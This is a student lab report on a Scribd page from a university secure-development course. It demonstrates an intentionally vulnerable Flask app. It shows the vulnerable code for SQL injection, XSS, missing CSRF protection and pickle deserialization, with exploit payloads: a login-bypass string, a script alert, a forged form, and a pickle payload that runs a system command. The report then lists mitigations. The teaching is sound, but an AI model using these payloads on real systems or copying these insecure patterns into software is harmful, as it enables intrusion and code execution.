0% found this document useful (0 votes)

126 views5 pages

Vulnerability Testing in Flask App

This report demonstrates common web application vulnerabilities using a vulnerable Flask application for educational purposes. It covers SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery, and Insecure Deserialization, detailing their exploit methods and impacts. Recommendations for mitigation include sanitizing inputs, using parameterized queries, implementing CSRF tokens, and avoiding insecure libraries.

Uploaded by

mahengejimson02

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

126 views5 pages

Vulnerability Testing in Flask App

Uploaded by

mahengejimson02

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

THE UNIVERSITY OF DODOMA

COLLEGE OF INFORMATICS AND VIRTUAL EDUCATION

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING(CSE)
COURSE TITTLE: SECURE SYSTEM DEVELOPMENT
COURSE CODE: IA 326
GROUP 1 PRACTICAL: VULNERABILITY TEST ON WEB FRAMEWORK
Vulnerable Flask Application - Security Demonstration Report

Introduction
This report outlines a practical demonstration of common web application vulnerabilities using a
custom-built Flask application. The goal is to simulate real-world attack scenarios and understand how
such vulnerabilities can be exploited. The application contains intentionally vulnerable code for
educational and testing purposes.

Environment Setup

Requirements
• Python 3.13+
• pip / venv packages (python3.13-venv, python3-pip)
• Flask
• SQLite3

Installation Steps
sudo apt install python3.13-venv python3-pip -y
python3 -m venv malware-env
source malware-env/bin/activate
pip install -r [Link]

Database Initialization
Run the following script to initialize the database:
python init_db.py

This script creates a [Link] SQLite file with the following users:

• admin / admin123
• user1 / pass1

Run the Application

python [Link]

Access the web app in your browser at [Link]

Vulnerability Demonstrations

1. SQL Injection (SQLi)

• Endpoint: /login
• Vulnerable Code:
query = f"SELECT * FROM users WHERE username = '{username}' AND password =
'{password}'"

• Exploit Payload:
Username: ' OR '1'='1
Password: anything

• Impact: Bypasses login authentication.

2. Cross-Site Scripting (XSS)

• Endpoint: /comment

• Vulnerable Code:
return f"<p>{name}: {comment}</p>"

• Exploit Payload:
<script>alert('XSS');</script>

• Impact: Executes arbitrary JavaScript in victim's browser.

3. Cross-Site Request Forgery (CSRF)

• Endpoint: /change-email

• Vulnerable Behavior: No CSRF protection (e.g., tokens).

• Exploit HTML:
<form action="[Link] method="POST">
<input type="hidden" name="email" value="attacker@[Link]">
<input type="submit" value="Submit">
</form>

• Impact: Forces user to change their email without consent.

4. Insecure Deserialization
• Endpoint: /deserialize

• Vulnerable Code:
obj = [Link]([Link](data))

• Exploit:
import pickle, os

class Evil:
def __reduce__(self):
return ([Link], ("gnome-calculator",))

payload = [Link](Evil()).hex()
print(payload)

Submit the hex string via the form.

• Impact: Launches GNOME Calculator, demonstrating arbitrary code execution on the system.

Observations
Vulnerability Severity Exploitable Remotely Mitigation Required
SQLi High Yes Use parameterized queries
XSS High Yes Escape and sanitize output
CSRF Medium Yes Use CSRF tokens, verify origin headers
Deserialization Critical Yes Avoid pickle for untrusted input
Recommendations
1. Sanitize All User Inputs – Prevent injection and script execution.
2. Use ORM or Parameterized Queries – Protect against SQL injection.
3. Implement CSRF Tokens – Especially for sensitive POST forms.
4. Avoid Insecure Libraries – Do not use [Link] on untrusted data.

5. Use Security Linters & Scanners – e.g., Semgrep, Bandit.

Conclusion
This exercise highlights the importance of secure coding practices in web development. Each
vulnerability here is commonly found in real applications and can lead to serious compromise. It is
essential for developers and security professionals to understand both the attack and mitigation
techniques.

Python Web App Security Best Practices
No ratings yet
Python Web App Security Best Practices
25 pages
Web & Mail Security Threats Overview
No ratings yet
Web & Mail Security Threats Overview
81 pages
OWASP Vulnerabilities in Web App Audit
No ratings yet
OWASP Vulnerabilities in Web App Audit
32 pages
Heal HTB Machine Walkthrough
No ratings yet
Heal HTB Machine Walkthrough
15 pages
Buffer Overflow and Security Vulnerabilities
No ratings yet
Buffer Overflow and Security Vulnerabilities
11 pages
DVWA Vulnerability Analysis and Mitigation
No ratings yet
DVWA Vulnerability Analysis and Mitigation
25 pages
OWASP Top Ten 2022: Vulnerabilities Overview
No ratings yet
OWASP Top Ten 2022: Vulnerabilities Overview
45 pages
API Hacking: Broken Authentication Guide
No ratings yet
API Hacking: Broken Authentication Guide
8 pages
Understanding OWASP Top 10 Risks
No ratings yet
Understanding OWASP Top 10 Risks
11 pages
Vulnerability Assessment Summary Report
No ratings yet
Vulnerability Assessment Summary Report
12 pages
Zphisher: Phishing Tool Overview
No ratings yet
Zphisher: Phishing Tool Overview
33 pages
Understanding Shellcode in Cybersecurity
No ratings yet
Understanding Shellcode in Cybersecurity
13 pages
Secure Web Application Practices
No ratings yet
Secure Web Application Practices
8 pages
NGINX SSRF Misconfiguration Guide
No ratings yet
NGINX SSRF Misconfiguration Guide
57 pages
Python Web Vulnerability Scanner Report
No ratings yet
Python Web Vulnerability Scanner Report
33 pages
OpenStack Security Vulnerabilities Guide
No ratings yet
OpenStack Security Vulnerabilities Guide
31 pages
Website Vulnerability Detection Tool
No ratings yet
Website Vulnerability Detection Tool
8 pages
Open Redirects & XSS Vulnerabilities Report
No ratings yet
Open Redirects & XSS Vulnerabilities Report
27 pages
Web Application Hacking Explained
No ratings yet
Web Application Hacking Explained
8 pages
Untitled
No ratings yet
Untitled
772 pages
Understanding CSRF Vulnerabilities
No ratings yet
Understanding CSRF Vulnerabilities
90 pages
Cracking Hashes & Diffie-Hellman Vulnerabilities
No ratings yet
Cracking Hashes & Diffie-Hellman Vulnerabilities
4 pages
Snyk's Top 10 Code Vulnerabilities 2022
No ratings yet
Snyk's Top 10 Code Vulnerabilities 2022
6 pages
Secure Software Engineering Lab Manual
No ratings yet
Secure Software Engineering Lab Manual
26 pages
Xecryption Challenge Analysis Report
No ratings yet
Xecryption Challenge Analysis Report
29 pages
Vulnerability Summary: CVEs 2023-2024
No ratings yet
Vulnerability Summary: CVEs 2023-2024
5 pages
Website Vulnerability Checker Overview
No ratings yet
Website Vulnerability Checker Overview
81 pages
Web Application Hacking Overview
No ratings yet
Web Application Hacking Overview
9 pages
Unix Hacking Vulnerabilities Guide
No ratings yet
Unix Hacking Vulnerabilities Guide
80 pages
Hydra Attack Mitigation Strategies
No ratings yet
Hydra Attack Mitigation Strategies
11 pages
Ethical Hacking and Cyber Anonymity Guide
No ratings yet
Ethical Hacking and Cyber Anonymity Guide
23 pages
Web Application Attack Vectors Guide
No ratings yet
Web Application Attack Vectors Guide
59 pages
Web Hacking Tehnicques 2023
No ratings yet
Web Hacking Tehnicques 2023
82 pages
Top10 Web Hack Tech 23
No ratings yet
Top10 Web Hack Tech 23
82 pages
Web Vulnerabilities Overview
100% (1)
Web Vulnerabilities Overview
35 pages
Defensive Coding with CodeQL in GitHub
No ratings yet
Defensive Coding with CodeQL in GitHub
5 pages
VAPT Findings for XYZ Corporation
No ratings yet
VAPT Findings for XYZ Corporation
24 pages
Web Application Security Vulnerabilities
No ratings yet
Web Application Security Vulnerabilities
5 pages
Secure Software Development Guide
No ratings yet
Secure Software Development Guide
15 pages
Lua Web App Security Vulnerabilities
No ratings yet
Lua Web App Security Vulnerabilities
10 pages
Week 3 Penetration Testing Findings
No ratings yet
Week 3 Penetration Testing Findings
13 pages
Penetration Testing Report for Cetreno
No ratings yet
Penetration Testing Report for Cetreno
26 pages
Python Scripts for Network and Security Tasks
No ratings yet
Python Scripts for Network and Security Tasks
15 pages
ISCL Practical File Overview
No ratings yet
ISCL Practical File Overview
16 pages
Python Scripts for Cybersecurity Tasks
100% (1)
Python Scripts for Cybersecurity Tasks
91 pages
Social Engineering Phishing Attack Guide
No ratings yet
Social Engineering Phishing Attack Guide
4 pages
WAF Bypassing Techniques and Cheat Sheet
No ratings yet
WAF Bypassing Techniques and Cheat Sheet
33 pages
Common Web App Vulnerabilities Overview
No ratings yet
Common Web App Vulnerabilities Overview
22 pages
WebSploit Labs: Red Team Exercises
No ratings yet
WebSploit Labs: Red Team Exercises
60 pages
SQL Injection and XSS Lab Manual
No ratings yet
SQL Injection and XSS Lab Manual
11 pages
Unit 4
No ratings yet
Unit 4
11 pages
Python Cybersecurity Roadmap
No ratings yet
Python Cybersecurity Roadmap
19 pages
Mitigating Common Cyber Vulnerabilities
No ratings yet
Mitigating Common Cyber Vulnerabilities
105 pages
Penetration Testing Report: Web App Security
No ratings yet
Penetration Testing Report: Web App Security
7 pages
Understanding CSRF Attacks and Mitigation
No ratings yet
Understanding CSRF Attacks and Mitigation
7 pages
DemoPasswordManager v1.0
No ratings yet
DemoPasswordManager v1.0
28 pages
L07 - Hacking' With You
No ratings yet
L07 - Hacking' With You
92 pages
CP 111 Ue-2
No ratings yet
CP 111 Ue-2
10 pages
Loop and Selection Program RAM Analysis
No ratings yet
Loop and Selection Program RAM Analysis
10 pages
CP111test 1 & 2
No ratings yet
CP111test 1 & 2
3 pages
RAM Representation in Loop Program
No ratings yet
RAM Representation in Loop Program
5 pages
MT 1117 Lecture 7
No ratings yet
MT 1117 Lecture 7
148 pages
BT 413 Group 4
No ratings yet
BT 413 Group 4
7 pages
CP 111
No ratings yet
CP 111
8 pages
Linux File Systems and Installation Guide
No ratings yet
Linux File Systems and Installation Guide
56 pages
TCP Header: Ephemeral Port Usage
No ratings yet
TCP Header: Ephemeral Port Usage
82 pages
Networking Protocols Overview
No ratings yet
Networking Protocols Overview
83 pages
Transport Layer Protocols Overview
No ratings yet
Transport Layer Protocols Overview
82 pages
Networking Routers & Protocols Course
No ratings yet
Networking Routers & Protocols Course
2 pages
CN 211: Networking Protocols Overview
No ratings yet
CN 211: Networking Protocols Overview
30 pages
Understanding ACLs in Networking
No ratings yet
Understanding ACLs in Networking
19 pages
APIPA and DHCP Configuration Guide
No ratings yet
APIPA and DHCP Configuration Guide
6 pages
Bootstrap Framework Overview and Setup
No ratings yet
Bootstrap Framework Overview and Setup
54 pages
Understanding XML: Structure and Usage
No ratings yet
Understanding XML: Structure and Usage
48 pages
Introduction to PHP Programming Basics
No ratings yet
Introduction to PHP Programming Basics
83 pages
Essential Software Security Insights
No ratings yet
Essential Software Security Insights
24 pages
UML Diagrams for Security Management
No ratings yet
UML Diagrams for Security Management
19 pages
Understanding AJAX for Web Development
No ratings yet
Understanding AJAX for Web Development
38 pages
Security Risks in Development Frameworks
No ratings yet
Security Risks in Development Frameworks
58 pages
Software Framework Vulnerabilities Explained
No ratings yet
Software Framework Vulnerabilities Explained
26 pages
IPSec Protocols and Functions MCQs
No ratings yet
IPSec Protocols and Functions MCQs
1 page
DNSSEC: Security and Implementation Guide
No ratings yet
DNSSEC: Security and Implementation Guide
70 pages
CRM Demo Considerations for Businesses
No ratings yet
CRM Demo Considerations for Businesses
7 pages
BCA-402 PHP Exam Questions April 2022
No ratings yet
BCA-402 PHP Exam Questions April 2022
2 pages
BarefootIntoCyberspace BeckyHogge
No ratings yet
BarefootIntoCyberspace BeckyHogge
161 pages
E-Commerce and Enterprise Systems Overview
No ratings yet
E-Commerce and Enterprise Systems Overview
71 pages
Hashing Files: MD5 & SHA Techniques
No ratings yet
Hashing Files: MD5 & SHA Techniques
4 pages
iPhone 13 Free Fire SDK Log Details
No ratings yet
iPhone 13 Free Fire SDK Log Details
2,052 pages
Data Quality Services
No ratings yet
Data Quality Services
196 pages
AISSCE XII Computer Science Practical
No ratings yet
AISSCE XII Computer Science Practical
39 pages
PTCUL Officers Directory
No ratings yet
PTCUL Officers Directory
20 pages
Setting Up GitHub Copilot in VS Code
No ratings yet
Setting Up GitHub Copilot in VS Code
12 pages
Curfew E-Pass Management System
No ratings yet
Curfew E-Pass Management System
4 pages
Dreamweaver Web Page Creation Guide
No ratings yet
Dreamweaver Web Page Creation Guide
24 pages
Overview of Computer Networks
No ratings yet
Overview of Computer Networks
63 pages
D PDD DY 23 Deploy - PowerProtect - DD - Exam
No ratings yet
D PDD DY 23 Deploy - PowerProtect - DD - Exam
4 pages
Introduction to Perl Programming
No ratings yet
Introduction to Perl Programming
11 pages
15 Free AI Tools for Earning Money
100% (1)
15 Free AI Tools for Earning Money
3 pages
UMass Isenberg Marketing Resume
No ratings yet
UMass Isenberg Marketing Resume
1 page
SAP Spool Administration Overview
No ratings yet
SAP Spool Administration Overview
3 pages
File 443 FM-Tco3 Ruptela Tachograph Solution
No ratings yet
File 443 FM-Tco3 Ruptela Tachograph Solution
13 pages
MATLAB Programming Certificate from Vanderbilt
No ratings yet
MATLAB Programming Certificate from Vanderbilt
1 page
AI & Data Science Networks Lab Manual
No ratings yet
AI & Data Science Networks Lab Manual
54 pages
HDFS Command Usage Guide
No ratings yet
HDFS Command Usage Guide
8 pages
Arduino Robotic Arm Tutorial Code
75% (4)
Arduino Robotic Arm Tutorial Code
4 pages
iOS Image Handling with Xamarin Guide
No ratings yet
iOS Image Handling with Xamarin Guide
26 pages
Assignment No.1 in Autocad
No ratings yet
Assignment No.1 in Autocad
8 pages
Iconnet: Internet Solutions by PLN
No ratings yet
Iconnet: Internet Solutions by PLN
16 pages
Overview of Computer Generations
No ratings yet
Overview of Computer Generations
7 pages
Fenwic Telecommunications Overview
No ratings yet
Fenwic Telecommunications Overview
4 pages
S-EYE V1.2 User Manual
100% (1)
S-EYE V1.2 User Manual
7 pages
Algo Paging Adapter Installation Guide
No ratings yet
Algo Paging Adapter Installation Guide
43 pages

Vulnerability Testing in Flask App

Uploaded by

Vulnerability Testing in Flask App

Uploaded by

THE UNIVERSITY OF DODOMA

COLLEGE OF INFORMATICS AND VIRTUAL EDUCATION

Run the Application

Access the web app in your browser at [Link]

1. SQL Injection (SQLi)

• Impact: Bypasses login authentication.

2. Cross-Site Scripting (XSS)

• Impact: Executes arbitrary JavaScript in victim's browser.

3. Cross-Site Request Forgery (CSRF)

• Vulnerable Behavior: No CSRF protection (e.g., tokens).

• Impact: Forces user to change their email without consent.

Submit the hex string via the form.

5. Use Security Linters & Scanners – e.g., Semgrep, Bandit.

You might also like